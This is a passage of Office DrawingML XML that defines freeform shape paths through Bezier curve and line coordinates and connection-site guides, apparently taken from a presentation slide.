                  <a:cubicBezTo>
                    <a:pt x="371416" y="82186"/>
                    <a:pt x="360787" y="76495"/>
                    <a:pt x="378246" y="88135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="383142" y="95479"/>
                    <a:pt x="390144" y="101794"/>
                    <a:pt x="392935" y="110168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398003" y="125372"/>
                    <a:pt x="394460" y="117964"/>
                    <a:pt x="403952" y="132202"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="418641" y="176269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422313" y="187286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425986" y="198303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="428298" y="232985"/>
                    <a:pt x="425660" y="242512"/>
                    <a:pt x="433330" y="268077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="435555" y="275492"/>
                    <a:pt x="438227" y="282766"/>
                    <a:pt x="440675" y="290110"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="444347" y="301127"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="443123" y="323161"/>
                    <a:pt x="442767" y="345260"/>
                    <a:pt x="440675" y="367228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="440308" y="371082"/>
                    <a:pt x="439740" y="375508"/>
                    <a:pt x="437003" y="378245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434266" y="380982"/>
                    <a:pt x="429658" y="380694"/>
                    <a:pt x="425986" y="381918"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="403952" y="379470"/>
                    <a:pt x="380917" y="381584"/>
                    <a:pt x="359885" y="374573"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352540" y="372125"/>
                    <a:pt x="344293" y="371522"/>
                    <a:pt x="337851" y="367228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320371" y="355576"/>
                    <a:pt x="333704" y="362680"/>
                    <a:pt x="312145" y="356212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304730" y="353987"/>
                    <a:pt x="290111" y="348867"/>
                    <a:pt x="290111" y="348867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286439" y="346419"/>
                    <a:pt x="283127" y="343315"/>
                    <a:pt x="279094" y="341522"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="272019" y="338378"/>
                    <a:pt x="264405" y="336626"/>
                    <a:pt x="257060" y="334178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221627" y="322368"/>
                    <a:pt x="249927" y="330691"/>
                    <a:pt x="168926" y="326833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="146892" y="319489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135875" y="315816"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="128530" y="308472"/>
                    <a:pt x="119602" y="302425"/>
                    <a:pt x="113841" y="293783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104049" y="279094"/>
                    <a:pt x="110169" y="285214"/>
                    <a:pt x="95480" y="275421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93032" y="271749"/>
                    <a:pt x="91256" y="267525"/>
                    <a:pt x="88135" y="264404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85014" y="261283"/>
                    <a:pt x="80024" y="260381"/>
                    <a:pt x="77118" y="257060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71305" y="250417"/>
                    <a:pt x="62429" y="235026"/>
                    <a:pt x="62429" y="235026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61205" y="231354"/>
                    <a:pt x="60488" y="227471"/>
                    <a:pt x="58757" y="224009"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56783" y="220061"/>
                    <a:pt x="53151" y="217049"/>
                    <a:pt x="51412" y="212992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49424" y="208353"/>
                    <a:pt x="49190" y="203137"/>
                    <a:pt x="47740" y="198303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45515" y="190888"/>
                    <a:pt x="42843" y="183614"/>
                    <a:pt x="40395" y="176269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39171" y="172597"/>
                    <a:pt x="38870" y="168474"/>
                    <a:pt x="36723" y="165253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15677" y="133681"/>
                    <a:pt x="40910" y="173627"/>
                    <a:pt x="25706" y="143219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23732" y="139271"/>
                    <a:pt x="20154" y="136235"/>
                    <a:pt x="18362" y="132202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18355" y="132185"/>
                    <a:pt x="9184" y="104668"/>
                    <a:pt x="7345" y="99151"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3672" y="88135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77118"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3882" y="26649"/>
                    <a:pt x="9181" y="12853"/>
                    <a:pt x="11017"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423037" y="1689652"/>
              <a:ext cx="310100" cy="652007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 147099 w 310100"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 652007"/>
                <a:gd name="connsiteX1" fmla="*/ 147099 w 310100"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 652007"/>
                <a:gd name="connsiteX2" fmla="*/ 186855 w 310100"/>
                <a:gd name="connsiteY2" fmla="*/ 27830 h 652007"/>
                <a:gd name="connsiteX3" fmla="*/ 198782 w 310100"/>
                <a:gd name="connsiteY3" fmla="*/ 35781 h 652007"/>
                <a:gd name="connsiteX4" fmla="*/ 214685 w 310100"/>
                <a:gd name="connsiteY4" fmla="*/ 59635 h 652007"/>
                <a:gd name="connsiteX5" fmla="*/ 222636 w 310100"/>
                <a:gd name="connsiteY5" fmla="*/ 71562 h 652007"/>
                <a:gd name="connsiteX6" fmla="*/ 230587 w 310100"/>
                <a:gd name="connsiteY6" fmla="*/ 83489 h 652007"/>
                <a:gd name="connsiteX7" fmla="*/ 238539 w 310100"/>
                <a:gd name="connsiteY7" fmla="*/ 91440 h 652007"/>
                <a:gd name="connsiteX8" fmla="*/ 250466 w 310100"/>
                <a:gd name="connsiteY8" fmla="*/ 115294 h 652007"/>
                <a:gd name="connsiteX9" fmla="*/ 262393 w 310100"/>
                <a:gd name="connsiteY9" fmla="*/ 135172 h 652007"/>
                <a:gd name="connsiteX10" fmla="*/ 274320 w 310100"/>
                <a:gd name="connsiteY10" fmla="*/ 170953 h 652007"/>
                <a:gd name="connsiteX11" fmla="*/ 278295 w 310100"/>
                <a:gd name="connsiteY11" fmla="*/ 182880 h 652007"/>
                <a:gd name="connsiteX12" fmla="*/ 286246 w 310100"/>
                <a:gd name="connsiteY12" fmla="*/ 226612 h 652007"/>
                <a:gd name="connsiteX13" fmla="*/ 294198 w 310100"/>
                <a:gd name="connsiteY13" fmla="*/ 250466 h 652007"/>
                <a:gd name="connsiteX14" fmla="*/ 298173 w 310100"/>
                <a:gd name="connsiteY14" fmla="*/ 262393 h 652007"/>
                <a:gd name="connsiteX15" fmla="*/ 302149 w 310100"/>
                <a:gd name="connsiteY15" fmla="*/ 286247 h 652007"/>
                <a:gd name="connsiteX16" fmla="*/ 310100 w 310100"/>
                <a:gd name="connsiteY16" fmla="*/ 318052 h 652007"/>
                <a:gd name="connsiteX17" fmla="*/ 306125 w 310100"/>
                <a:gd name="connsiteY17" fmla="*/ 381663 h 652007"/>
                <a:gd name="connsiteX18" fmla="*/ 294198 w 310100"/>
                <a:gd name="connsiteY18" fmla="*/ 421419 h 652007"/>
                <a:gd name="connsiteX19" fmla="*/ 290222 w 310100"/>
                <a:gd name="connsiteY19" fmla="*/ 433346 h 652007"/>
                <a:gd name="connsiteX20" fmla="*/ 286246 w 310100"/>
                <a:gd name="connsiteY20" fmla="*/ 445273 h 652007"/>
                <a:gd name="connsiteX21" fmla="*/ 278295 w 310100"/>
                <a:gd name="connsiteY21" fmla="*/ 457200 h 652007"/>
                <a:gd name="connsiteX22" fmla="*/ 270344 w 310100"/>
                <a:gd name="connsiteY22" fmla="*/ 481054 h 652007"/>
                <a:gd name="connsiteX23" fmla="*/ 266368 w 310100"/>
                <a:gd name="connsiteY23" fmla="*/ 492981 h 652007"/>
                <a:gd name="connsiteX24" fmla="*/ 262393 w 310100"/>
                <a:gd name="connsiteY24" fmla="*/ 516835 h 652007"/>
                <a:gd name="connsiteX25" fmla="*/ 258417 w 310100"/>
                <a:gd name="connsiteY25" fmla="*/ 528762 h 652007"/>
                <a:gd name="connsiteX26" fmla="*/ 250466 w 310100"/>
                <a:gd name="connsiteY26" fmla="*/ 568518 h 652007"/>
                <a:gd name="connsiteX27" fmla="*/ 242514 w 310100"/>
                <a:gd name="connsiteY27" fmla="*/ 580445 h 652007"/>
                <a:gd name="connsiteX28" fmla="*/ 238539 w 310100"/>
                <a:gd name="connsiteY28" fmla="*/ 592372 h 652007"/>
                <a:gd name="connsiteX29" fmla="*/ 218660 w 310100"/>
                <a:gd name="connsiteY29" fmla="*/ 612251 h 652007"/>
                <a:gd name="connsiteX30" fmla="*/ 206733 w 310100"/>
                <a:gd name="connsiteY30" fmla="*/ 624178 h 652007"/>
                <a:gd name="connsiteX31" fmla="*/ 198782 w 310100"/>
                <a:gd name="connsiteY31" fmla="*/ 636105 h 652007"/>
                <a:gd name="connsiteX32" fmla="*/ 186855 w 310100"/>
                <a:gd name="connsiteY32" fmla="*/ 644056 h 652007"/>
                <a:gd name="connsiteX33" fmla="*/ 163001 w 310100"/>
                <a:gd name="connsiteY33" fmla="*/ 652007 h 652007"/>
                <a:gd name="connsiteX34" fmla="*/ 135172 w 310100"/>
                <a:gd name="connsiteY34" fmla="*/ 640080 h 652007"/>
                <a:gd name="connsiteX35" fmla="*/ 119269 w 310100"/>
                <a:gd name="connsiteY35" fmla="*/ 636105 h 652007"/>
                <a:gd name="connsiteX36" fmla="*/ 95415 w 310100"/>
                <a:gd name="connsiteY36" fmla="*/ 616226 h 652007"/>
                <a:gd name="connsiteX37" fmla="*/ 83488 w 310100"/>
                <a:gd name="connsiteY37" fmla="*/ 608275 h 652007"/>
                <a:gd name="connsiteX38" fmla="*/ 71561 w 310100"/>
                <a:gd name="connsiteY38" fmla="*/ 596348 h 652007"/>
                <a:gd name="connsiteX39" fmla="*/ 67586 w 310100"/>
                <a:gd name="connsiteY39" fmla="*/ 584421 h 652007"/>
                <a:gd name="connsiteX40" fmla="*/ 63610 w 310100"/>
                <a:gd name="connsiteY40" fmla="*/ 556591 h 652007"/>
                <a:gd name="connsiteX41" fmla="*/ 55659 w 310100"/>
                <a:gd name="connsiteY41" fmla="*/ 544665 h 652007"/>
                <a:gd name="connsiteX42" fmla="*/ 51683 w 310100"/>
                <a:gd name="connsiteY42" fmla="*/ 532738 h 652007"/>
                <a:gd name="connsiteX43" fmla="*/ 43732 w 310100"/>
                <a:gd name="connsiteY43" fmla="*/ 524786 h 652007"/>
                <a:gd name="connsiteX44" fmla="*/ 27829 w 310100"/>
                <a:gd name="connsiteY44" fmla="*/ 500932 h 652007"/>
                <a:gd name="connsiteX45" fmla="*/ 11926 w 310100"/>
                <a:gd name="connsiteY45" fmla="*/ 461176 h 652007"/>
                <a:gd name="connsiteX46" fmla="*/ 7951 w 310100"/>
                <a:gd name="connsiteY46" fmla="*/ 449249 h 652007"/>
                <a:gd name="connsiteX47" fmla="*/ 0 w 310100"/>
                <a:gd name="connsiteY47" fmla="*/ 369736 h 652007"/>
                <a:gd name="connsiteX48" fmla="*/ 3975 w 310100"/>
                <a:gd name="connsiteY48" fmla="*/ 238539 h 652007"/>
                <a:gd name="connsiteX49" fmla="*/ 7951 w 310100"/>
                <a:gd name="connsiteY49" fmla="*/ 186856 h 652007"/>
                <a:gd name="connsiteX50" fmla="*/ 15902 w 310100"/>
                <a:gd name="connsiteY50" fmla="*/ 163002 h 652007"/>
                <a:gd name="connsiteX51" fmla="*/ 19878 w 310100"/>
                <a:gd name="connsiteY51" fmla="*/ 147099 h 652007"/>
                <a:gd name="connsiteX52" fmla="*/ 35780 w 310100"/>
                <a:gd name="connsiteY52" fmla="*/ 119270 h 652007"/>
                <a:gd name="connsiteX53" fmla="*/ 43732 w 310100"/>
                <a:gd name="connsiteY53" fmla="*/ 91440 h 652007"/>
                <a:gd name="connsiteX54" fmla="*/ 67586 w 310100"/>
                <a:gd name="connsiteY54" fmla="*/ 59635 h 652007"/>
                <a:gd name="connsiteX55" fmla="*/ 75537 w 310100"/>
                <a:gd name="connsiteY55" fmla="*/ 47708 h 652007"/>
                <a:gd name="connsiteX56" fmla="*/ 87464 w 310100"/>
                <a:gd name="connsiteY56" fmla="*/ 39757 h 652007"/>
                <a:gd name="connsiteX57" fmla="*/ 107342 w 310100"/>
                <a:gd name="connsiteY57" fmla="*/ 23854 h 652007"/>
                <a:gd name="connsiteX58" fmla="*/ 115293 w 310100"/>
                <a:gd name="connsiteY58" fmla="*/ 11927 h 652007"/>
                <a:gd name="connsiteX59" fmla="*/ 147099 w 310100"/>
                <a:gd name="connsiteY59" fmla="*/ 0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0100" h="652007">
                  <a:moveTo>
                    <a:pt x="147099" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147099" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186855" y="27830"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="190783" y="30550"/>
                    <a:pt x="198782" y="35781"/>
                    <a:pt x="198782" y="35781"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="214685" y="59635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222636" y="71562"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225286" y="75538"/>
                    <a:pt x="227208" y="80111"/>
                    <a:pt x="230587" y="83489"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="238539" y="91440"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="248530" y="121418"/>
                    <a:pt x="235052" y="84467"/>
                    <a:pt x="250466" y="115294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260788" y="135939"/>
                    <a:pt x="246860" y="119641"/>
                    <a:pt x="262393" y="135172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="274320" y="170953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278295" y="182880"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="281094" y="202469"/>
                    <a:pt x="281136" y="209577"/>
                    <a:pt x="286246" y="226612"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288654" y="234640"/>
                    <a:pt x="291548" y="242515"/>
                    <a:pt x="294198" y="250466"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295523" y="254442"/>
                    <a:pt x="297484" y="258259"/>
                    <a:pt x="298173" y="262393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299498" y="270344"/>
                    <a:pt x="300460" y="278365"/>
                    <a:pt x="302149" y="286247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304439" y="296932"/>
                    <a:pt x="310100" y="318052"/>
                    <a:pt x="310100" y="318052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308775" y="339256"/>
                    <a:pt x="308239" y="360523"/>
                    <a:pt x="306125" y="381663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305267" y="390242"/>
                    <a:pt x="295975" y="416088"/>
                    <a:pt x="294198" y="421419"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="290222" y="433346"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="288897" y="437322"/>
                    <a:pt x="288571" y="441786"/>
                    <a:pt x="286246" y="445273"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="278295" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270344" y="481054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266368" y="492981"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="265043" y="500932"/>
                    <a:pt x="264142" y="508966"/>
                    <a:pt x="262393" y="516835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261484" y="520926"/>
                    <a:pt x="259239" y="524653"/>
                    <a:pt x="258417" y="528762"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255977" y="540961"/>
                    <a:pt x="256452" y="556546"/>
                    <a:pt x="250466" y="568518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248329" y="572792"/>
                    <a:pt x="245165" y="576469"/>
                    <a:pt x="242514" y="580445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241189" y="584421"/>
                    <a:pt x="241053" y="589019"/>
                    <a:pt x="238539" y="592372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232916" y="599869"/>
                    <a:pt x="225286" y="605625"/>
                    <a:pt x="218660" y="612251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214684" y="616227"/>
                    <a:pt x="209852" y="619500"/>
                    <a:pt x="206733" y="624178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204083" y="628154"/>
                    <a:pt x="202161" y="632726"/>
                    <a:pt x="198782" y="636105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195403" y="639484"/>
                    <a:pt x="191221" y="642115"/>
                    <a:pt x="186855" y="644056"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179196" y="647460"/>
                    <a:pt x="163001" y="652007"/>
                    <a:pt x="163001" y="652007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117335" y="640589"/>
                    <a:pt x="173620" y="656556"/>
                    <a:pt x="135172" y="640080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130150" y="637928"/>
                    <a:pt x="124570" y="637430"/>
                    <a:pt x="119269" y="636105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107969" y="624804"/>
                    <a:pt x="111955" y="628040"/>
                    <a:pt x="95415" y="616226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91527" y="613449"/>
                    <a:pt x="87159" y="611334"/>
                    <a:pt x="83488" y="608275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79169" y="604676"/>
                    <a:pt x="75537" y="600324"/>
                    <a:pt x="71561" y="596348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70236" y="592372"/>
                    <a:pt x="68408" y="588530"/>
                    <a:pt x="67586" y="584421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65748" y="575232"/>
                    <a:pt x="66303" y="565567"/>
                    <a:pt x="63610" y="556591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62237" y="552015"/>
                    <a:pt x="57796" y="548938"/>
                    <a:pt x="55659" y="544665"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53785" y="540917"/>
                    <a:pt x="53839" y="536332"/>
                    <a:pt x="51683" y="532738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49755" y="529524"/>
                    <a:pt x="45981" y="527785"/>
                    <a:pt x="43732" y="524786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37998" y="517141"/>
                    <a:pt x="27829" y="500932"/>
                    <a:pt x="27829" y="500932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18969" y="465491"/>
                    <a:pt x="27606" y="476854"/>
                    <a:pt x="11926" y="461176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10601" y="457200"/>
                    <a:pt x="8967" y="453315"/>
                    <a:pt x="7951" y="449249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="784" y="420578"/>
                    <a:pt x="2313" y="404440"/>
                    <a:pt x="0" y="369736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1325" y="326004"/>
                    <a:pt x="2075" y="282250"/>
                    <a:pt x="3975" y="238539"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4726" y="221277"/>
                    <a:pt x="5256" y="203923"/>
                    <a:pt x="7951" y="186856"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9258" y="178577"/>
                    <a:pt x="13869" y="171133"/>
                    <a:pt x="15902" y="163002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17227" y="157701"/>
                    <a:pt x="17959" y="152215"/>
                    <a:pt x="19878" y="147099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24201" y="135571"/>
                    <a:pt x="29190" y="129156"/>
                    <a:pt x="35780" y="119270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36716" y="115525"/>
                    <a:pt x="41139" y="96108"/>
                    <a:pt x="43732" y="91440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68957" y="46035"/>
                    <a:pt x="50035" y="81573"/>
                    <a:pt x="67586" y="59635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70571" y="55904"/>
                    <a:pt x="72158" y="51087"/>
                    <a:pt x="75537" y="47708"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78916" y="44329"/>
                    <a:pt x="83733" y="42742"/>
                    <a:pt x="87464" y="39757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115788" y="17097"/>
                    <a:pt x="70633" y="48326"/>
                    <a:pt x="107342" y="23854"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109992" y="19878"/>
                    <a:pt x="111562" y="14912"/>
                    <a:pt x="115293" y="11927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118565" y="9309"/>
                    <a:pt x="127220" y="7951"/>
                    <a:pt x="147099"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615732" y="544664"/>
              <a:ext cx="465151" cy="373712"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 465151"/>
                <a:gd name="connsiteY0" fmla="*/ 35781 h 373712"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 465151"/>
                <a:gd name="connsiteY1" fmla="*/ 35781 h 373712"/>
                <a:gd name="connsiteX2" fmla="*/ 7951 w 465151"/>
                <a:gd name="connsiteY2" fmla="*/ 71562 h 373712"/>
                <a:gd name="connsiteX3" fmla="*/ 11927 w 465151"/>
                <a:gd name="connsiteY3" fmla="*/ 83489 h 373712"/>
                <a:gd name="connsiteX4" fmla="*/ 19878 w 465151"/>
                <a:gd name="connsiteY4" fmla="*/ 119270 h 373712"/>
                <a:gd name="connsiteX5" fmla="*/ 23854 w 465151"/>
                <a:gd name="connsiteY5" fmla="*/ 131197 h 373712"/>
                <a:gd name="connsiteX6" fmla="*/ 31805 w 465151"/>
                <a:gd name="connsiteY6" fmla="*/ 143124 h 373712"/>
                <a:gd name="connsiteX7" fmla="*/ 47708 w 465151"/>
                <a:gd name="connsiteY7" fmla="*/ 178905 h 373712"/>
                <a:gd name="connsiteX8" fmla="*/ 59635 w 465151"/>
                <a:gd name="connsiteY8" fmla="*/ 186856 h 373712"/>
                <a:gd name="connsiteX9" fmla="*/ 67586 w 465151"/>
                <a:gd name="connsiteY9" fmla="*/ 198783 h 373712"/>
                <a:gd name="connsiteX10" fmla="*/ 83489 w 465151"/>
                <a:gd name="connsiteY10" fmla="*/ 214686 h 373712"/>
                <a:gd name="connsiteX11" fmla="*/ 87465 w 465151"/>
                <a:gd name="connsiteY11" fmla="*/ 226613 h 373712"/>
                <a:gd name="connsiteX12" fmla="*/ 103367 w 465151"/>
                <a:gd name="connsiteY12" fmla="*/ 246491 h 373712"/>
                <a:gd name="connsiteX13" fmla="*/ 115294 w 465151"/>
                <a:gd name="connsiteY13" fmla="*/ 254442 h 373712"/>
                <a:gd name="connsiteX14" fmla="*/ 131197 w 465151"/>
                <a:gd name="connsiteY14" fmla="*/ 274320 h 373712"/>
                <a:gd name="connsiteX15" fmla="*/ 143124 w 465151"/>
                <a:gd name="connsiteY15" fmla="*/ 278296 h 373712"/>
                <a:gd name="connsiteX16" fmla="*/ 155051 w 465151"/>
                <a:gd name="connsiteY16" fmla="*/ 286247 h 373712"/>
                <a:gd name="connsiteX17" fmla="*/ 163002 w 465151"/>
                <a:gd name="connsiteY17" fmla="*/ 294199 h 373712"/>
                <a:gd name="connsiteX18" fmla="*/ 174929 w 465151"/>
                <a:gd name="connsiteY18" fmla="*/ 298174 h 373712"/>
                <a:gd name="connsiteX19" fmla="*/ 182880 w 465151"/>
                <a:gd name="connsiteY19" fmla="*/ 306126 h 373712"/>
                <a:gd name="connsiteX20" fmla="*/ 206734 w 465151"/>
                <a:gd name="connsiteY20" fmla="*/ 314077 h 373712"/>
                <a:gd name="connsiteX21" fmla="*/ 218661 w 465151"/>
                <a:gd name="connsiteY21" fmla="*/ 318053 h 373712"/>
                <a:gd name="connsiteX22" fmla="*/ 230588 w 465151"/>
                <a:gd name="connsiteY22" fmla="*/ 326004 h 373712"/>
                <a:gd name="connsiteX23" fmla="*/ 254442 w 465151"/>
                <a:gd name="connsiteY23" fmla="*/ 333955 h 373712"/>
                <a:gd name="connsiteX24" fmla="*/ 266369 w 465151"/>
                <a:gd name="connsiteY24" fmla="*/ 337931 h 373712"/>
                <a:gd name="connsiteX25" fmla="*/ 278296 w 465151"/>
                <a:gd name="connsiteY25" fmla="*/ 341906 h 373712"/>
                <a:gd name="connsiteX26" fmla="*/ 290223 w 465151"/>
                <a:gd name="connsiteY26" fmla="*/ 349858 h 373712"/>
                <a:gd name="connsiteX27" fmla="*/ 314077 w 465151"/>
                <a:gd name="connsiteY27" fmla="*/ 357809 h 373712"/>
                <a:gd name="connsiteX28" fmla="*/ 341906 w 465151"/>
                <a:gd name="connsiteY28" fmla="*/ 365760 h 373712"/>
                <a:gd name="connsiteX29" fmla="*/ 377687 w 465151"/>
                <a:gd name="connsiteY29" fmla="*/ 369736 h 373712"/>
                <a:gd name="connsiteX30" fmla="*/ 401541 w 465151"/>
                <a:gd name="connsiteY30" fmla="*/ 373712 h 373712"/>
                <a:gd name="connsiteX31" fmla="*/ 461176 w 465151"/>
                <a:gd name="connsiteY31" fmla="*/ 369736 h 373712"/>
                <a:gd name="connsiteX32" fmla="*/ 465151 w 465151"/>
                <a:gd name="connsiteY32" fmla="*/ 357809 h 373712"/>
                <a:gd name="connsiteX33" fmla="*/ 457200 w 465151"/>
                <a:gd name="connsiteY33" fmla="*/ 310101 h 373712"/>
                <a:gd name="connsiteX34" fmla="*/ 437322 w 465151"/>
                <a:gd name="connsiteY34" fmla="*/ 286247 h 373712"/>
                <a:gd name="connsiteX35" fmla="*/ 425395 w 465151"/>
                <a:gd name="connsiteY35" fmla="*/ 262393 h 373712"/>
                <a:gd name="connsiteX36" fmla="*/ 417444 w 465151"/>
                <a:gd name="connsiteY36" fmla="*/ 250466 h 373712"/>
                <a:gd name="connsiteX37" fmla="*/ 409492 w 465151"/>
                <a:gd name="connsiteY37" fmla="*/ 226613 h 373712"/>
                <a:gd name="connsiteX38" fmla="*/ 401541 w 465151"/>
                <a:gd name="connsiteY38" fmla="*/ 202759 h 373712"/>
                <a:gd name="connsiteX39" fmla="*/ 389614 w 465151"/>
                <a:gd name="connsiteY39" fmla="*/ 166978 h 373712"/>
                <a:gd name="connsiteX40" fmla="*/ 385638 w 465151"/>
                <a:gd name="connsiteY40" fmla="*/ 155051 h 373712"/>
                <a:gd name="connsiteX41" fmla="*/ 381663 w 465151"/>
                <a:gd name="connsiteY41" fmla="*/ 139148 h 373712"/>
                <a:gd name="connsiteX42" fmla="*/ 373711 w 465151"/>
                <a:gd name="connsiteY42" fmla="*/ 107343 h 373712"/>
                <a:gd name="connsiteX43" fmla="*/ 365760 w 465151"/>
                <a:gd name="connsiteY43" fmla="*/ 95416 h 373712"/>
                <a:gd name="connsiteX44" fmla="*/ 345882 w 465151"/>
                <a:gd name="connsiteY44" fmla="*/ 67586 h 373712"/>
                <a:gd name="connsiteX45" fmla="*/ 337931 w 465151"/>
                <a:gd name="connsiteY45" fmla="*/ 55659 h 373712"/>
                <a:gd name="connsiteX46" fmla="*/ 314077 w 465151"/>
                <a:gd name="connsiteY46" fmla="*/ 43733 h 373712"/>
